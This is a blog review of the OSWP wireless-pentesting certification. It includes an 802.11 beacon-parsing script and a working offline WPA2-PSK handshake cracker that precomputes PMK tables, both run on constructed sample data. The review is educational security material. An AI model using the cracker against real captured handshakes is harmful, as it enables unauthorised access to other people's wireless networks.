This is my review of the OSWP course material. I passed this certification in late 2019.
The Offensive Security Wireless Professional is a certification course and exam that tests your knowledge around wireless penetration testing. Offensive Security is easily my favorite certification vendor simply because of their exam approach. The entirely practical exam means that you don’t pass unless you can actually attack and gain access to their wireless networks. In this case, you receive SSH access to an attacker machine with nearby wireless networks. You pass by successfully compromising the wireless networks.
What I’ll be covering
- General Structure
- Inner workings of Wifi
- Example PCAPs
- More WEP
- OMG WEP
- WPA / WPA2
- Attacking WPA/2
- Mass attacking tools
- Wardriving tools
- Precomputing tools – CPU and GPU
- Other exercises
- Enterprise Authentication
- And the lack thereof
- Why you should be okay with this
For the uninitiated, Offensive Security will provide course materials to you once you register for the course. This includes a PDF of their course work that should be considered a text book, as well as a lab guide. In addition, you’ll be provided with videos to correspond with the materials. Finally, for this course they’ll provide you with an ISO of the attacking VM that they suggest using.
It’s worth noting that the VM they provide is quite outdated. It works perfectly well, and won’t hinder you at all for the course or beyond, meaning you’ll still be able to apply all of your knowledge to a shiny new VM as well. Still, the general stigma around OffSec is that they need some updating, so this doesn’t help.
The course materials really start with a foundation of “how Wifi works” which I thought was fantastic. After years of SysAdmin work, and a dozen other industry certifications, this was the first textbook that actually talked about the structure of a wireless packet. For the first time in my career, I felt like I actually knew what was happening over the air. It shouldn’t be up to the OSWP to provide this knowledge, but this fundamental understanding of the traffic is absolutely crucial to feeling comfortable and confident that you know what your attacks are doing.
The structure of APs and Clients and the communications they perform are clearly laid out, each with a matching PCAP file that’s been filtered down to show only the needed information. Specific packet details are called out in each PCAP gradually. At the end you can tell what you’re looking at, even if you’re unfamiliar with the flag being set in a particular section of the packet.
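To make the "what am I looking at" part concrete, here is an added example (my own code, not course material) that decodes the pieces those PCAPs walk you through: the Frame Control flags, the three addresses, the sequence number, and the tagged parameters of a beacon, including the RSN element that tells you whether a network is WPA2-PSK or WPA2 Enterprise. The beacon is constructed inline with a hypothetical BSSID and SSID, and it assumes any radiotap header has already been stripped so the bytes start at the 802.11 MAC header.

```python
import struct

# Added example: a minimal 802.11 management-frame parser. The sample beacon below
# is constructed inline (not a real capture); radiotap/PRISM headers are assumed
# to have been stripped already, so frame[0] is the first byte of the MAC header.

TYPE_NAMES = {0: "management", 1: "control", 2: "data", 3: "extension"}
MGMT_SUBTYPES = {0: "assoc-req", 1: "assoc-resp", 4: "probe-req", 5: "probe-resp",
                 8: "beacon", 10: "disassoc", 11: "auth", 12: "deauth"}
RSN_OUI = b"\x00\x0f\xac"            # IEEE 802.11i suite-selector OUI
WPA1_OUI_TYPE = b"\x00\x50\xf2\x01"  # Microsoft OUI, type 1 = legacy WPA vendor IE
CIPHERS = {1: "WEP-40", 2: "TKIP", 4: "CCMP", 5: "WEP-104"}
AKMS = {1: "802.1X", 2: "PSK"}
BSSID = bytes.fromhex("001122334455")  # hypothetical AP address


def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def parse_mac_header(frame: bytes) -> dict:
    """Decode Frame Control (type/subtype/flags), the three addresses and Sequence Control."""
    fc0, fc1 = frame[0], frame[1]
    ftype, subtype = (fc0 >> 2) & 0x3, fc0 >> 4
    return {
        "type": TYPE_NAMES[ftype],
        "subtype": MGMT_SUBTYPES.get(subtype, subtype) if ftype == 0 else subtype,
        "to_ds": bool(fc1 & 0x01), "from_ds": bool(fc1 & 0x02),
        "retry": bool(fc1 & 0x08), "protected": bool(fc1 & 0x40),
        "addr1": mac_str(frame[4:10]), "addr2": mac_str(frame[10:16]),
        "addr3": mac_str(frame[16:22]),
        "seq": struct.unpack_from("<H", frame, 22)[0] >> 4,  # low 4 bits are the fragment number
    }


def suite_name(sel: bytes, table: dict) -> str:
    """A suite selector is OUI(3) + type(1); only the 802.11i OUI is mapped to names."""
    return table.get(sel[3], f"unknown-{sel[3]}") if sel[:3] == RSN_OUI else sel.hex()


def parse_rsn(ie: bytes) -> dict:
    """RSN IE (tag 48): version, group cipher, pairwise cipher list, AKM list."""
    version = struct.unpack_from("<H", ie, 0)[0]
    group = suite_name(ie[2:6], CIPHERS)
    n_pair = struct.unpack_from("<H", ie, 6)[0]
    off = 8
    pairwise = [suite_name(ie[off + 4 * i: off + 4 * i + 4], CIPHERS) for i in range(n_pair)]
    off += 4 * n_pair
    n_akm = struct.unpack_from("<H", ie, off)[0]
    off += 2
    akm = [suite_name(ie[off + 4 * i: off + 4 * i + 4], AKMS) for i in range(n_akm)]
    return {"version": version, "group": group, "pairwise": pairwise, "akm": akm}


def parse_beacon(frame: bytes) -> dict:
    """Header + fixed fields (timestamp, interval, capability) + tagged parameters."""
    hdr = parse_mac_header(frame)
    if hdr["subtype"] != "beacon":
        raise ValueError("not a beacon frame")
    _timestamp, interval, cap = struct.unpack_from("<QHH", frame, 24)
    info = {**hdr, "bssid": hdr["addr3"], "beacon_interval": interval,
            "privacy": bool(cap & 0x0010),  # capability bit 4: Privacy (WEP or WPA/WPA2)
            "ssid": None, "channel": None, "rsn": None, "wpa1": False}
    off = 36
    while off + 2 <= len(frame):  # walk the tag/length/value elements
        tag, length = frame[off], frame[off + 1]
        val = frame[off + 2: off + 2 + length]
        if tag == 0:
            info["ssid"] = val.decode("utf-8", "replace")
        elif tag == 3:      # DS Parameter Set: current channel
            info["channel"] = val[0]
        elif tag == 48:     # RSN (WPA2)
            info["rsn"] = parse_rsn(val)
        elif tag == 221 and val[:4] == WPA1_OUI_TYPE:
            info["wpa1"] = True
        off += 2 + length
    if info["rsn"]:
        info["security"] = "WPA2-" + "/".join(info["rsn"]["akm"])
    elif info["wpa1"]:
        info["security"] = "WPA1"
    else:
        info["security"] = "WEP" if info["privacy"] else "Open"
    return info


def build_sample_beacon(security: str = "wpa2-psk") -> bytes:
    """Construct a beacon for the hypothetical AP; only the security-relevant bits vary."""
    cap = 0x0401 | (0x0010 if security != "open" else 0)   # ESS + short slot, plus Privacy
    mac = bytes([0x80, 0x00, 0x00, 0x00]) + b"\xff" * 6 + BSSID + BSSID + struct.pack("<H", 16 << 4)
    fixed = struct.pack("<QHH", 0x1234567890, 100, cap)
    ies = b"\x00\x09CorpGuest" + b"\x01\x08\x82\x84\x8b\x96\x0c\x12\x18\x24" + b"\x03\x01\x06"
    if security.startswith("wpa2"):
        akm = b"\x02" if security == "wpa2-psk" else b"\x01"
        ies += (b"\x30\x14" + b"\x01\x00" + RSN_OUI + b"\x04" + b"\x01\x00" + RSN_OUI + b"\x04"
                + b"\x01\x00" + RSN_OUI + akm + b"\x00\x00")
    return mac + fixed + ies
```

Running parse_beacon(build_sample_beacon()) gives a dict with type "management", subtype "beacon", the broadcast destination in addr1, the BSSID in addr3, SSID "CorpGuest" on channel 6, and security "WPA2-PSK"; switching the builder to "wpa2-eap" flips the AKM to 802.1X, which is the one-byte difference between a network you crack offline and one you do not.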
WEP – So Much WEP
Then the materials get into actual attacks, starting with WEP networks. And why not? WEP is easily bypassed and riddled with various ways to accomplish our goal.
And after a little about WEP, they move on into WEP with clients vs without clients.
And then WEP with various techniques.
And you begin wondering if they will ever teach you anything else.
The WEP section of the materials easily makes up 60% of the coursework.
This can be really disappointing.
As somebody that always tries to see both sides of view, I really try to justify this. After all, you’ve just received the crucial and vitally important fundamental knowledge about how WiFi is supposed to work, it should be just as valuable to understand how it fails. It should be.
The reality is, it just sucks. Any modern wifi attack toolkit will fully automate WEP attacks. While it’s great to understand it, I’m never going to execute it manually. Ever. Its presence in 2020 is few and far between. The WEP portion of this material needs to be trimmed.
That said, you WILL know how to attack it. You’ll set up a few different scenarios in your lab and go through each. You’ll know it inside and out. There is something to be said for that.
You’ll also just type wifite -i wlan0 and never think about it again.
WPA and WPA2
After all that nonsense, you’ll be excited to step into the WPA/2 sections. The WEP sections satisfy a deeply technical knowledge that you don’t get the same way in WPA based networks. Although you’ll get an understanding of the design of these systems, you’ll quickly learn that your attack surface is quite different.
You’ll cover the same concepts, review some PCAPs of the traffic and set up some labs to attack. The biggest difference is that you’ll find these attacks to be a lot more passive. In fact, they’re so passive that it almost leaves you wanting more WEP-like material, but for WPA/2 of course.
In my opinion, the modern wireless encryption standards have seen more “one-off” exploits and the course materials could benefit from sharing some of those.
The same way you would be remiss to exclude ShellShock or Drupalgeddon from a PenTest crash course, it seems that a few exploits are worth highlighting. I’m thinking along the lines of routers where WPS PINs were quickly and easily bypassed, or the more recent Kr00k-based attacks. Attacks like these come and go as the firmware is updated, but I think it would be a nice addition to the material.
In addition to the WPA/2 based attack options, the OSWP dives into some toolkits that might be useful throughout your wireless auditing. I think they do a really good job covering a lot of bases that I wouldn’t have asked for, but I’m glad I know about.
This included tools like coWPAtty or Pyrit to precompute SSID and password possibilities using your GPU. It included Kismet and plugins to introduce the concepts of wardriving and taking actual useful data out of it. It included passively decrypting traffic for an IDS feed. The entire aircrack suite is covered.
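The "passive" WPA/2 attack from the earlier section and the precomputation those tools do are the same calculation seen from two ends, so here is one added example (my own code, not from the course or any of the tools named) that carries it through: derive the PMK from SSID and passphrase, expand it into the PTK, recompute the MIC on message 2 of the 4-way handshake, and compare against the captured one. The handshake is constructed inline with hypothetical MACs, nonces and passphrase so it runs offline; the MIC is computed as HMAC-SHA1-128, which assumes an RSN/WPA2 handshake with key descriptor version 2 (the usual CCMP case). The PMK function is checked against the published IEEE 802.11i test vector ("password"/"IEEE").

```python
import hashlib
import hmac

# Added example, not course material. Everything below the imports is constructed:
# hypothetical addresses, nonces and passphrase, and an EAPOL-Key message 2 we sign
# ourselves so that the "crack" step has something real to verify against.

SSID = "CorpGuest"
AP_MAC = bytes.fromhex("001122334455")   # hypothetical authenticator address (AA)
STA_MAC = bytes.fromhex("66778899aabb")  # hypothetical supplicant address (SPA)
ANONCE = bytes(range(32))                # hypothetical nonces
SNONCE = bytes(range(32, 64))
TRUE_PASSPHRASE = "Summer2019!"          # hypothetical
MIC_OFFSET = 81   # EAPOL header (4) + descriptor fields preceding the MIC (77)


def derive_pmk(ssid: str, passphrase: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes). The SSID is the
    salt, so a precomputed table (what genpmk / pyrit build) is only valid for that SSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3."""
    out = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK from PMK plus both MACs and both nonces; the first 16 bytes are the KCK."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """MIC over the EAPOL-Key frame with its own MIC field zeroed (descriptor version 2)."""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes) -> bytes:
    """EAPOL-Key message 2/4 skeleton: key info 0x010a (v2, pairwise, MIC), MIC zeroed."""
    body = (b"\x02"                      # descriptor type: RSN
            + b"\x01\x0a"                # key information
            + b"\x00\x10"                # key length 16 (CCMP)
            + b"\x00" * 7 + b"\x01"      # replay counter
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # nonce, IV, RSC, ID
            + b"\x00" * 16 + b"\x00\x00")                         # MIC, key data length 0
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body      # EAPOL v2, type Key


def sample_handshake() -> bytes:
    """Play the client: sign message 2 with the KCK derived from the true passphrase."""
    ptk = derive_ptk(derive_pmk(SSID, TRUE_PASSPHRASE), AP_MAC, STA_MAC, ANONCE, SNONCE)
    m2 = build_msg2(SNONCE)
    return m2[:MIC_OFFSET] + eapol_mic(ptk[:16], m2) + m2[MIC_OFFSET + 16:]


def precompute_pmks(ssid: str, wordlist) -> dict:
    """The expensive step (4096 PBKDF2 rounds per candidate) depends only on SSID + candidate,
    so it can be done once per SSID and reused for every handshake captured on that SSID."""
    return {w: derive_pmk(ssid, w) for w in wordlist}


def crack(ssid, aa, spa, anonce, snonce, eapol, wordlist, pmk_table=None):
    """Return the candidate whose KCK reproduces the captured MIC, or None."""
    captured = eapol[MIC_OFFSET:MIC_OFFSET + 16]
    for cand in wordlist:
        pmk = pmk_table[cand] if pmk_table else derive_pmk(ssid, cand)
        kck = derive_ptk(pmk, aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol), captured):
            return cand
    return None


if __name__ == "__main__":
    hs = sample_handshake()
    words = ["Summer20", "password", "Summer2019!", "CorpGuest"]
    print(crack(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, hs, words, precompute_pmks(SSID, words)))
```

Two things fall out of running it: nothing in the attacker's path needs a packet sent to the AP once the handshake is on disk, and the only per-handshake work is the cheap PTK/MIC step, so a per-SSID PMK table pays for itself the moment you capture a second handshake from the same network name.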
Although technically, none of that is specific to WPA/2, I had placed that entire section within the WPA knowledge in my head, primarily because it was all relevant and useful knowledge.
Those additions to the course exceeded my expectations. While I expected to be able to attack wireless, I had not really anticipated the variety of toolkits that would also be useful to me from a SOC point of view.
When I came towards the end of the material, I was surprised to see that there was NO material focused on attacking WPA Enterprise networks. This was disappointing…
… Until I put an ounce of thought into it…
If you’re taking the course, you understand attacking the PSK (PreShared Key). With Enterprise, the password (and username) you’re looking for aren’t actually negotiated by the AP. This is in your materials as well, where it highlights the communication between the AP and the authentication server. If you want these credentials, you need to get them from the back end system, which is almost always going to be Active Directory.
If you want to connect to WPA-PSK, attack the PSK. If you want to connect to WPA-Enterprise, attack the enterprise.
Under that context, it’s a little easier to see why there isn’t anything in the materials on attacking it. Do you expect that you’ll be able to reverse the ciphertext of the certificate-based authentication? Or would it be easier to get Initial Access to the company by a different means?
If they’re using AD Username and Password for the Enterprise Authentication, then it would be far easier to social engineer a username and password out of a person who likes to click emails vs. actually attempting to attack the Enterprise authentication process exclusively from the wireless.
In my own personal opinion, it can be perceived that Enterprise might be LESS secure than PSK, simply because your wireless is only as secure as the least-secure minded employee. Username and “Summer20” is a pretty terrible wireless protection. Good enterprise security would include good logging and employee awareness. Certificate based auth would be better, but I think a lot of IT departments are scared off by that. As a result, the easier thing to implement is a good PSK, which the average IT person or IT department can properly secure quickly and easily.
Is it worth it?
Yes – I think it’s a small price to pay for wireless attack knowledge, and you’ll definitely walk away with your money’s worth.
Would I recommend it?
Yes – Anybody considering it probably already knows enough about what they’re getting into that they’ll be happy they did it.
Do I think you’ll be disappointed?
Yes – The common complaint with OffSec is the outdated material, and this is no exception. Despite this, the quality of their material is still high enough for it to be overlooked, and still considered valuable.
Overall, I can confidently attack wireless and know I’ll get in if there is a chance to get in. I would add that any home or SOHO router is basically easily bypassed after a small amount of review because of predictable passwords and OSINT. Businesses make the same mistakes: find that predictable password and you can generally get in.
Offsec gets asked frequently if they’re going to update the material. OSCP has seen significant additions to the material this year, and that’s more of their flagship cert than this one, but it’s a good sign for them. I would personally like to see a little less on WEP. The history is important, and the foundational knowledge is necessary to execute the other attacks with confidence, but all modern wifi attack tools have fully automated WEP cracking and eliminate the need for any WEP knowledge. By shaving down that material, additional techniques around WPA/WPA2 could be discussed, like specific exploits (Kr00k, Reaver-based attacks). In addition, a small amount of discussion around Enterprise might be a good addition.